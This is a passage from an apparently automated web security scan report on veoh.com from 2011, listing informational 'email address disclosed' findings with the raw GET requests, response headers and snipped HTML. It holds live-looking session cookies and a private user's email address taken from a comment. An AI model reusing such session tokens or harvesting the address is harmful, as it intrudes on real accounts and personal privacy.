Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.209. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The following email address was disclosed in the response:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.210. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The following email address was disclosed in the response:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.211. http://www.veoh.com/register  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The following email address was disclosed in the response:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.212. http://www.veoh.com/search/videos/q/-MENUVALUE-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The following email address was disclosed in the response:

Request

GET /search/videos/q/-MENUVALUE- HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 57062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.213. http://www.veoh.com/search/videos/q/publisher:bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The following email address was disclosed in the response:

Request

GET /search/videos/q/publisher:bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=79
Content-Length: 72609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.214. http://www.veoh.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /support.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support.html HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 24001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.215. http://www.veoh.com/users/JDFox5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/JDFox5

Issue detail

The following email address was disclosed in the response:

Request

GET /users/JDFox5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 33281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.216. http://www.veoh.com/users/MitchRider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/MitchRider

Issue detail

The following email address was disclosed in the response:

Request

GET /users/MitchRider HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 35062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.217. http://www.veoh.com/users/Veoh-Action-Anime  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Action-Anime

Issue detail

The following email address was disclosed in the response:

Request

GET /users/Veoh-Action-Anime HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 33392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.218. http://www.veoh.com/users/Veoh-Horror-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Horror-Movies

Issue detail

The following email address was disclosed in the response:

Request

GET /users/Veoh-Horror-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 32667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.219. http://www.veoh.com/users/Veoh-Upcoming-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Upcoming-Movies

Issue detail

The following email addresses were disclosed in the response:

Request

GET /users/Veoh-Upcoming-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=44
Content-Length: 31732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="comment-body">Hey I am psychologist. To solve any problems relatad to human life. As well as pc &amp; net problems also. So to asked question?..mail me PRABANSHU.JI@GMAIL.COM</p>
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.220. http://www.veoh.com/users/bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/bunny12344

Issue detail

The following email address was disclosed in the response:

Request

GET /users/bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=52
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.221. http://www.veoh.com/users/tonysurfs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/tonysurfs

Issue detail

The following email address was disclosed in the response:

Request

GET /users/tonysurfs HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=1
Content-Length: 33325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.222. http://www.veoh.com/veohtv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /veohtv

Issue detail

The following email address was disclosed in the response:

Request

GET /veohtv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 26797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

23.223. http://www.veoh.com/video/conduit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/conduit

Issue detail

The following email address was disclosed in the response:

Request

GET /video/conduit HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
